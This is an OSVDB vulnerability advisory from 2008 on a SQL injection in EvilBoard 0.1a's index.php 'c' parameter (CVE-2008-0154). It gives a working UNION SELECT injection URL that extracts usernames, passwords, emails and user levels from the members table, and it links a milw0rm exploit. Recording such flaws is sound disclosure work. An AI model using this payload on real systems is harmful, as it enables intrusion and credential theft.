EvilBoard index.php c Variable SQL Injection

2008-01-08T00:00:00
ID OSVDB:40206
Type osvdb
Reporter OSVDB
Modified 2008-01-08T00:00:00

Description

Manual Testing Notes

http://[target]/EvilBoard_0.1a/index.php?c='//union//select//1,concat(username,char(77),password,char(77),email_address,char(77),info,char(77),user_level,char(77))//from//eb_members//where/*/userid=1/

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/4865 CVE-2008-0154